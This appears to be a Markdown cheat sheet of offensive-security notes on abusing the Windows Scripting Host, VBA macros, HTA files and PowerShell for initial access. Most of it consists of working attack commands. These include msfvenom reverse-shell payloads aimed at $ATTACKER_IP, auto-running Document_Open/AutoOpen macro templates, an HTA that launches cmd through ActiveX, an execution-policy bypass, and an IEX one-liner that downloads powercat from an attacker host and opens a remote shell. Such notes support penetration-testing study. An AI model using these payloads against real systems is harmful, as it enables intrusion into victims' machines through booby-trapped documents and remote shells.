93 lines
2.2 KiB
Markdown
93 lines
2.2 KiB
Markdown
# Windows Scripting Host (WSH)
|
|
|
|
|
|
## Visual Basic Script (VB Script)
|
|
* `cscript file.exe`, command line scripts
|
|
* `wscript file.exe`, UI scripts
|
|
|
|
* Example (watch out for the whitespace after path, it has to be included)
|
|
```sh
|
|
Set shell = WScript.CreateObject("Wscript.Shell")
|
|
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
|
|
```
|
|
```sh
|
|
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
|
|
```
|
|
|
|
## Visual Basic for Application (VBA)
|
|
* Access Windows API via Macros
|
|
* Open Word, `view` --> `macros`, give a name and select document in `Macros in`
|
|
* Create reverse shell
|
|
```sh
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
|
|
```
|
|
* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros
|
|
```sh
|
|
Sub Document_Open()
|
|
SHELL
|
|
End Sub
|
|
|
|
Sub AutoOpen()
|
|
SHELL
|
|
End Sub
|
|
|
|
Sub SHELL()
|
|
<reverse shell goes here>
|
|
End Sub
|
|
```
|
|
|
|
## HTML Application (HTA)
|
|
|
|
* HTML file including some kind of scripting language like JS, VB, ActiveX
|
|
* `mshta` is used to excecute
|
|
|
|
### POC
|
|
* Download file via attacker's web server
|
|
* File should look like
|
|
```HTML
|
|
<html>
|
|
<body>
|
|
<script>
|
|
var shell= 'cmd.exe'
|
|
new ActiveXObject('WScript.Shell').Run(shell);
|
|
</script>
|
|
</body>
|
|
</html>
|
|
```
|
|
* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document`
|
|
|
|
|
|
### Reverse Shell
|
|
* Craft reverse shell via `msfvenom`
|
|
```sh
|
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
|
|
```
|
|
* `msfconsole` via
|
|
```sh
|
|
use exploit/windows/misc/hta_server
|
|
```
|
|
|
|
## Powershell
|
|
|
|
* Powershell execution policy can be checked via
|
|
```sh
|
|
Get-ExecutionPolicy
|
|
```
|
|
* Set policy via
|
|
```sh
|
|
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
|
|
```
|
|
* Bypass via
|
|
```sh
|
|
powershell -ex bypass -File shell.ps1
|
|
```
|
|
* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via
|
|
```sh
|
|
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
|
|
```
|
|
* Or use msfvenom
|
|
```sh
|
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
|
|
```
|
|
|